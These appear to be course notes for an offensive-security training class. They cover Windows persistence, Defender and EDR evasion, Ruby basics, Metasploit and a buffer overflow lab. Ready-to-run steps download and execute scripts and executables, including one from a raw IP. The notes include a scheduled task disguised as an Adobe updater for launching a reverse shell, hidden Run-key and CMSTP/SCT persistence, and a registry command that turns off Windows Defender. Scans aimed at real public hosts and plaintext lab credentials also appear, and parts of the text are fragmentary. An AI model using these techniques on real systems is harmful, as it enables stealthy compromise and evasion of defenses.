#################

# Lab Deployers #

#################

https://github.com/jaredhaight/PowerShellClassLab

https://github.com/outflanknl/Invoke-ADLabDeployer

https://rastamouse.me/2018/03/a-view-of-persistence/

https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html

https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/

https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

####################

# Lateral Movement #

####################

###########################

# Bypassing EDR Solutions #

###########################

https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html

https://github.com/vysecurity/morphHTA

https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/

###############################

# Device Guard Check & Bypass #

###############################

https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-OSiRis.ps1

######################

# EDR Check & Bypass #

######################

https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-EDRCheck.ps1

###############

# Persistance #

###############

---- Scheduled Task Based Persistance ----

1. Scheduled task based on most commonly occuring event ID

https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1

To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

---------------------------Type This-----------------------------------

mkdir c:\persistence

cd c:\persistence

Get-ExecutionPolicy

Set-ExecutionPolicy Unrestricted –Force

$client = new-object System.Net.WebClient

$client.DownloadFile("https://raw.githubusercontent.com/TestingPens/MalwarePersistenceScripts/master/user_event_persistence.ps1","c:\persistence\user_event_persistence.ps1")

dir

.\user_event_persistence.ps1

-------------------------------------------------------------------------

- Alternative method 1:

-----------------------

As administrator create a basic task as an administrator with the following information:

Name:                    Adobe Systems Incorporated

Description:             This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.

Task Trigger:             Daily

Start a program:          C:\Windows\System32\calc.exe

- Alternative method 2:

-----------------------

In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"

- Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on target machine:

- adapt  <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable

- this scheduled task triggers on a event, can be changed to regular calls (e.g. once an hour)

--------------------------------

<?xml version="1.0" encoding="UTF-16"?>

<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">

  <RegistrationInfo>

    <Author>Adobe Systems Incorporated</Author>

    <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>

  </RegistrationInfo>

  <Triggers>

    <EventTrigger>

      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>

    </EventTrigger>

  </Triggers>

  <Principals>

    <Principal id="Author">

      <RunLevel>LeastPrivilege</RunLevel>

    </Principal>

  </Principals>

  <Settings>

    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>

    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>

    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>

    <AllowHardTerminate>true</AllowHardTerminate>

    <StartWhenAvailable>true</StartWhenAvailable>

    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>

    <IdleSettings>

      <StopOnIdleEnd>true</StopOnIdleEnd>

      <RestartOnIdle>false</RestartOnIdle>

    </IdleSettings>

    <AllowStartOnDemand>true</AllowStartOnDemand>

    <Enabled>true</Enabled>

    <Hidden>true</Hidden>

    <RunOnlyIfIdle>false</RunOnlyIfIdle>

    <WakeToRun>false</WakeToRun>

    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>

    <Priority>7</Priority>

  </Settings>

  <Actions Context="Author">

    <Exec>

      <Command>C:\Windows\System32\calc.exe</Command>

    </Exec>

  </Actions>

</Task>

---------------------------

Now let's create the scheduled task

---------------------------Type This-----------------------------------

schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"

----------------------------------------------------------------------- 

Sit back and wait for the task to trigger. By the way we got the correct XML file format by creating a scheduled tasked and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.

---- Registry Based Persistance ---

Note:

Beacon/Shell may prevent the user to login as he is hanging in the Beacon executable. Solution: spawn new beacon and exit initial beacon.

2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS

Let's try this:

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

2. Hide Reg

Let's try this code out:

https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741

Reference:

https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353

Get the following two files

---------------------------

https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1

https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1

In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible for regedit and powershell.

To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

---------------------------Type This-----------------------------------

mkdir c:\persistence

cd c:\persistence

(new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistence\PSReflect.ps1")

(new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistence\PSReflect-RegHide.ps1")

.\PSReflect-RegHide.ps1

-------------------------------------------------------------------------

Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:

---------------------------Type This-----------------------------------

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run

----------------------------------------------------------------------- 

However, it will be visible e.g. for Sysinternals Autorun tool

3. VShadow

Let's try this out:

https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/

1. Download vshadow.exe including in the WinSDK

    Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279

    Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk

2. Upload the vshadow.exe to the target machine

3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")

---------------------------Type This-----------------------------------

mkdir c:\persistence

cd c:\persistence

$client = new-object System.Net.WebClient

$client.DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe","c:\persistence\win10_vshadow_x64.exe")

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistence\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"

-----------------------------------------------------------------------

4. INF-SCT

Let's try this out:

https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/

https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

Technique 1: CMSTP

------------------

create "c:\persistence\cmstp.inf" with the following content:

-----------------------------------

;cmstp.exe cmstp.inf

[version]

Signature=$chicago$

AdvancedINF=2.5

[DefaultInstall_SingleUser]

UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]

%11%\scrobj.dll,NI,c:\persistence\test.sct

[Strings]

AppAct = "SOFTWARE\Microsoft\Connection Manager"

ServiceName="Yay"

ShortSvcName="Yay"

----------------------------------------------------

get a sample sct payload (e.g. https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct) and store it in "c:\persistence\test.sct"

---------------------------Type This-----------------------------------

mkdir c:\persistence

cd c:\persistence

$client = new-object System.Net.WebClient

$client.DownloadFile("https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct","c:\persistence\test.sct")

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d C:\Windows\System32\cmstp.exe\" /s C:\persistence\cmstp.inf"

-----------------------------------------------------------------------

reboot your machine

your sct payload will be executed upon reboot. HOWEVER, as a Windows binary executes it, Sysinternals Autorun tool will not show it, unless you untick  "Options->Hide Windows Entries" option

5. GPScript.exe

Let's try this out:

https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

---- Cobalt Strike Agressor Persistance Scripts ----

https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna

https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna

https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna

-------------------------------------------------------------------------------------------------------------

############################

# Day 2: Ruby Fundamentals #

############################

- I prefer to use Putty to SSH into my Linux host.

- You can download Putty from here:

- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into putty

Host Name:          149.28.201.171

protocol:           ssh

port:               22

username:           secureninja

password:           secureninja!!

- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer

scientist and programmer from Japan. It is a cross-platform dynamic language.

- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby

on Rails is a framework that is written in Ruby.

- Ruby's file name extensions are .rb and .rbw.

- official website of this

- language: www.ruby-lang.org.

- interactive Shell called Ruby Shell

- open up the interactive console and play around.

---------------------------Type This-----------------------------------

irb

-----------------------------------------------------------------------

- Math, Variables, Classes, Creating Objects and Inheritance

The following arithmetic operators:

    Addition operator (+) — 10 + 23

    Subtraction operator (-) — 1001 - 34

    Multiplication operator (*) — 5 * 5

    Division operator (/) — 12 / 2

- Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment

operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by

30. Again, 69 is assigned to y, and then y is incremented by 33.

---------------------------Type This-----------------------------------

x = 25

x + 30

y = 69

y+33

-----------------------------------------------------------------------

- Let's look at creating classes and creating objects.

- Here, the name of the class is Attack. An object has its properties and methods.

---------------------------Type This-----------------------------------

class Attack

attr_accessor :of, :sqli, :xss

end

-----------------------------------------------------------------------

What is nil?

Reference:

https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638

nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:

Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.

To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:

# Now that we have created the classes let's create the objects

---------------------------Type This-----------------------------------

first_attack = Attack.new

first_attack.of = "stack"

first_attack.sqli = "blind"

first_attack.xss = "dom"

puts first_attack.of

puts first_attack.sqli

puts first_attack.xss

-----------------------------------------------------------------------

- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,

inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which

one object can access the properties/attributes of another object of a different class. Inheritance makes your

programming life easier by maximizing code reuse.

---------------------------Type This-----------------------------------

class Exploitframeworks

attr_accessor :scanners, :exploits, :shellcode, :postmodules

end

class Metasploit < Exploitframeworks

end

class Canvas < Exploitframeworks

end

class Coreimpact < Exploitframeworks

end

class Saint < Exploitframeworks

end

class Exploitpack < Exploitframeworks

end

-----------------------------------------------------------------------

- Methods, More Objects, Arguments, String Functions and Expression Shortcuts

- Let's create a simple method. A method is used to perform an action and is generally called with an object.

- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,

it will print this string: "We are Learning how to PenTest"

- An object named 'bo' is created, which is used to call the method.

---------------------------Type This-----------------------------------

class Msfnl

def learning

puts "We are Learning how to PenTest"

end

end

-----------------------------------------------------------------------

#Now let's define an object for our Method

---------------------------Type This-----------------------------------

joe = Msfnl.new

joe.learning

-----------------------------------------------------------------------

- An argument is a value or variable that is passed to the function while calling it. In the following example, while

calling the puts() function, we are sending a string value to the function. This string value is used by the

function to perform some particular operations.

puts ("Pentesting")

- There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will

explain some useful string functions with an example.

- The length function calculates the length of a string. The upcase function converts a string to uppercase. And the

reverse function reverses a string. The following example demonstrates how to use the string functions.

---------------------------Type This-----------------------------------

55.class

"I Love Programming".class

"I Love Pentesting".length

"Pown that box".upcase

"Love" + "To Root Boxes"

"evil".reverse

"evil".reverse.upcase

-----------------------------------------------------------------------

-  expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand,  '=' is

an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the

examples of some expressions.

---------------------------Type This-----------------------------------

a = 3

b = 6

a+b+20

d = 44

f = d

puts f

-----------------------------------------------------------------------

- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated

assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following

statements to understand the shortcuts.

---------------------------Type This-----------------------------------

g = 70

g = g+44

g += 33

-----------------------------------------------------------------------

- In the above statement, g is incremented by 33 and then the total value is assigned to g.

---------------------------Type This-----------------------------------

g *= 3

-----------------------------------------------------------------------

- In the above statement, g is multiplied with 3 and then assigned to g.

- Example

- Comparison Operators, Loops, Data Types, and Constants

- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show

how to use the following comparison operators.

'Less than' operator (<): This operator is used to check whether a variable or constant is less than another

variable or constant. If it's less than the other, the 'less than' operator returns true.

'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable

or constant. If it's equal to the other, the 'equal to' operator returns true.

'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another

variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.

---------------------------Type This-----------------------------------

numberofports = 55

puts "number of ports found during scan" if numberofports < 300

numberofports = 400

puts "number of ports found during scan" if numberofports < 300

puts "number of ports found during scan" if numberofports == 300

puts "number of ports found during scan" if numberofports != 300

-----------------------------------------------------------------------

Example

- the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.

- This operator is generally used to combine multiple conditions.

- In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the

- following example to understand how this operator works.

---------------------------Type This-----------------------------------

ports = 100

puts "number of ports found on the network" if ports<100 || ports>200

puts "number of ports found on the network" if ports<100 || ports>75

-----------------------------------------------------------------------

# unless

---------------------------Type This-----------------------------------

portsbelow1024 = 50

puts "If the ports are below 1024" unless portsbelow1024 < 1000

puts "If the ports are below 1024" unless portsbelow1024 < 1055

puts "If the ports are below 1024" unless portsbelow1024 < 20

-----------------------------------------------------------------------

- The 'unless' keyword is used to do something programmatically unless a condition is true.

- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.

- See the following example to understand how a string is printed 10 times on the screen using a loop.

---------------------------Type This-----------------------------------

10.times do puts "infosecaddicts" end

-----------------------------------------------------------------------

# Or use the curly braces

---------------------------Type This-----------------------------------

10.times {puts "infosecaddicts"}

-----------------------------------------------------------------------

- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while

working with different data types. Data type conversion is also known as type casting.

- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you

change the value of a constant, you will see a warning message.

- Multiple Line String Variable, Interpolation, and Regular Expressions

- A multiple line string variable lets you assign the value to the string variable through multiple lines.

infosecaddicts = <<mark

welcome

to the

best

metasploit

on the

market

mark

puts infosecaddicts

-----------------------------------------------------------------------

- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that

it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.

Examine the following example to understand how interpolation works in Ruby.

References:

https://stackoverflow.com/questions/10869264/meaning-of-in-ruby

---------------------------Type This-----------------------------------

a = 4

b = 6

puts "a * b = a*b"

puts " #{a} * #{b} = #{a*b} "

person = "Joe McCray"

puts "IT Security consultant person"

puts "IT Security consultant #{person}"

-----------------------------------------------------------------------

- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.

- Character classes

infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"

"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}

"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}

-----------------------------------------------------------------------

- Arrays, Push and Pop, and Hashes

- In the following example, numbers is an array that holds 6 integer numbers.

---------------------------Type This-----------------------------------

numbers = [2,4,6,8,10,100]

puts numbers[0]

puts numbers[4]

numbers[2] = 150

puts numbers

- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.

framework = []

framework << "modules"

framework << "exploits"

framework << "payloads"

framework.pop

framework.shift

-----------------------------------------------------------------------

- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key

that is used to access the element.

- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.

In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the

respective values: 'what module should you use', 'Windows XP' and 'SSH'.

---------------------------Type This-----------------------------------

metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}

print metasploit.size

print metasploit["microsoft"]

metasploit['microsoft'] = 'redhat'

print metasploit['microsoft']

-----------------------------------------------------------------------

- Writing Ruby Scripts

- Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what

this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that

someone made to look for a specific port. The port that it is looking for is port 21 FTP.

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan

ls

-----------------------------------------------------------------------

###########################

# Metasploit Fundamentals #

###########################

- Let's take a little look at Metasploit Framework

- First, we should take note of the different directories, the Modular Architecture.

The modules that make up the Modular Architecture are

Exploits

Auxiliary

Payload

Encoder

Nops

Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,

are

Modules

Scripts

Plugins

External

Data

Tools

- Let's take a look inside the Metasploit directory and see what's the

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit

ls

-----------------------------------------------------------------------

- Now let's take a look inside the Modules directory and see what's there.

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/modules

ls

-----------------------------------------------------------------------

The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does

not necessarily need to - have a shell or session started on a machine.

The exploits directory has our modules that we need to pop a shell on a box.

The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses

like Burp Suite

- Let's take a look at the external directory

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/external

ls

-----------------------------------------------------------------------

- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/data

ls

-----------------------------------------------------------------------

- For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS

brute-forcing

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/data/wordlists

-----------------------------------------------------------------------

- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter

once a session is created.

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/data/meterpreter

ls

-----------------------------------------------------------------------

- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things

cd ~/toolz/metasploit/modules/exploits

-----------------------------------------------------------------------

succeeds.

---------------------------Type This-----------------------------------

application for it to be used as.

much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used

- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind

cd singles

cd windows

ls

-----------------------------------------------------------------------

- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and

see what it actually does.

---------------------------Type This-----------------------------------

-----------------------------------------------------------------------

Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give

the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that

it gives Windows to add the user to the system.

windows/shell/bind_tcp or windows/shell/reverse_tcp

---------------------------Type This-----------------------------------

cd ../../stagers

ls

-----------------------------------------------------------------------

ls windows/

-----------------------------------------------------------------------    

As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim

machine, so we can upload or download our stage payloads and execute commands.

Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with

our stagers...

cd ../stages

-----------------------------------------------------------------------    

Again, we can see that our stages are coded for particular operating systems and languages.

We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the

victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,

if any.

- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have

already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,

so we can impersonate other users on the system in hopes of elevating our privileges.

---------------------------Type This-----------------------------------

ls

cd windows/

ls

Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all

the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to

escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as

possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in

memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.

#################################

# Getting start with MSFConsole #

#################################

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit/

./msfconsole

----------------------------------------------------------------------

##############################################

# Run any Linux command inside of MSFConsole #

##############################################

Once you are inside of MSFConsole you want to do EVERYTHING

that you'd normally do in your Linux command shell in addition

to running Metasploit commands.

ls

pwd

ping -c1 yahoo.com

nmap yahoo.com

----------------------------------------------------------------------

- You're on the outside scanning publicly accessable targets.

---------------------------Type This-----------------------------------

use auxiliary/scanner/portscan/tcp

set RHOSTS 217.108.137.200

set PORTS 80,1433,1521,3306,8000,8080,8081,10000                      

run

----------------------------------------------------------------------

        - So let's do a quick google search for someone with trace.axd file

        - filetye:axd inurl:trace.axd

--------------------------Type This-----------------------------------

use auxiliary/scanner/http/     (press the tab key, then press y to look through the http options)

----------------------------------------------------------------------

- Here is an example:

---------------------------Type This-----------------------------------

use auxiliary/scanner/http/trace_axd

set RHOSTS 207.20.57.112

set VHOST www.motion-vr.net

run

----------------------------------------------------------------------

---------------------------Type This-----------------------------------

use auxiliary/scanner/http/http_version                

set RHOSTS 45.77.162.239

set RPORT 80

run

----------------------------------------------------------------------

---------------------------Type This-----------------------------------

use auxiliary/scanner/http/tomcat_enum                  

set RHOSTS 217.108.137.200

run

-----------------------------------------------------------------------

#####################################

# Quick Stack Based Buffer Overflow #

#####################################

- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)

http://45.63.104.73/ExploitLab.zip

- Extract the ExploitLab.zip file to your Desktop

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- In the new command prompt window where you ran nc type:

- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py

- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Calculate the distance to EIP by running script 3-3000chars.py

4-count-chars-to-EIP.py

- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)

- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

6-jmp-esp.py

7-first-exploit

- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.

------------------------------

-----------------------------------------------

   Stand Alone             Client Server               Web App

-------------

                       ***(9999)***

- Map & Fuzz app entry points:

------------------------------

   - Commands              ***(commands)***

   - Methods

   - Verbs

   - subroutines

- Isolate the crash

-------------------------------

We found that EIP was populated with the value: 396F4338

An online tool that we can use for this is:

https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html

A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.

We learned that we control EAX and ESP in script 2.

- Implement Shellcode

---------------------

There are only 2 things that can go wrong with shellcode:

- Bad characters

# FreeFloat FTP Server Exploit Analysis #

https://www.exploit-db.com/exploits/15689/

3. What is the actual distance to EIP in bytes?

4. Describe what is happening in the variable ‘junk2’

http://45.63.104.73/ff.zip

ff1.py

1. What does the sys module do?

2. What is sys.argv[1] and sys.argv[2]?

2. What is pattern_create.rb doing and where can I find it?

1. Explain what is happening in lines 17 - to 25?

ff4.py

ff5.py

1. Explain what is happening in line 15.

2. What is struct.pack?

3. How big is the shellcode in this script?

ff6.py

1. What is the distance to EIP?

2. How big is the shellcode in this script?

3. What is the total byte length of the data being sent to this app?

ff7.py

1. What is a tuple in python?

2. How big is the shellcode in this script?

3. Did your app crash in from this script?

ff8.py

1. How big is the shellcode in this script?

2. What is try/except in python?

3. What is socket.SOCK_STREAM in Python?

ff9.py

1. What is going on in lines 19 and 20?

2. What is the length of the NOPs?

3. From what DLL did the address of the JMP ESP come from?

ff010.py

1. What is going on in lines 18 - 20?

2. What is going on in lines 29 - 32?

3. How would a stack adjustment help this script? 

#####################################################

# Log into the Linux virtual machine on your laptop #

# username: infosecaddicts                          #

# password: infosecaddicts                          #

#####################################################

/bin/bash

sudo apt-get install -y build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev curl zlib1g-dev gawk bison libffi-dev libgdbm-dev libncurses5-dev libtool sqlite3 libgmp-dev gnupg2 dirmngr nmap

gpg2 --keyserver hkp://pool.sks-keyservers.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB

echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc

rvm use $RUBYVERSION --default

sudo git clone https://github.com/rapid7/metasploit-framework.git

mv metasploit-framework metasploit

cd ~/toolz/metasploit

rvm use $RUBYVERSION --default

ruby -v

gem install bundler

gem install bundler

bundle install

################################

Step 2: Run your command prompt as an administrator

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Step 3: Restart your computer (I'm sorry - I know this sux!)

Step 5: From your CentoS run the following commands

---------------------------Type This-----------------------------------

cd ~/

wget https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

cd ExploitLab/4-AttackScripts/

vi vulnserv.rb

cp vulnserv.rb ~/toolz/metasploit/modules/exploits/windows/misc

cd ~/toolz/metasploit/

./msfconsole

set PAYLOAD windows/meterpreter/bind_tcp